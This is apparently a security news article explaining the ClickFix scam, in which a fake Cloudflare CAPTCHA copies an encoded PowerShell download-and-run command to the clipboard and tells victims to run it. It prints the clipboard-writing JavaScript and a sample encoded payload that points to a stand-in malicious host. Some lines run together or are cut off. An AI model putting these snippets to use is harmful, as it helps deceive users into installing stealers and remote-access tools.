A new social engineering scam, nicknamed ClickFix, is making waves in the cybersecurity world by exploiting user trust in routine security checks.
Disguised as a Cloudflare CAPTCHA known as the “Turnstile” interface the attack lures unsuspecting victims into executing malware on their own systems through a technical sleight of hand that is deceptively simple, yet alarmingly effective.
Unlike classic phishing attacks, which rely on malicious downloads or phishing forms, ClickFix leverages clipboard hijacking and user-aided code execution. Here’s how the technical workflow unfolds:
⊞ Win+R (opening the Windows Run dialogue)Ctrl+V (to paste clipboard contents)Enter (to run the pasted command)navigator.clipboard.writeText('powershell -encodedcommand ...'); The copied command typically fetches and executes a second-stage malware payload from a remote server.The ClickFix pages are often distributed as self-contained HTML files with all styles, images, and scripts embedded. The phishing code is deeply obfuscated to evade analysis and detection. Here’s a simplified breakdown:
document.querySelector('#checkbox').addEventListener('click', function() { navigator.clipboard.writeText(atob('UABvAHcAZQByAFMAaABlAGwAbAAg...')); });Despite its low-tech approach, ClickFix remains effective due to a blend of technical concealment and psychological manipulation:
notionbox.org vs. notion.com) or even inject the code into legitimate, compromised websites.A common obfuscated PowerShell payload might look like:
powershellpowershell -encodedCommand "JAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIgBoAHQAdABwADoALwAvAGUAdgBpAGwALgBlAHgAZQAiADsAIgBwAG8AdwBlAHIAcABvAHMAdABqAG8AagBvAG4AUgBlAG0AbwB0AGUALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUgBlAHIAbwBLAGkAZAAoACkAIg=="
Decoded, this command typically downloads and executes a malicious payload, such as Lumma Stealer, Stealc, or RATs like NetSupport Manager.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…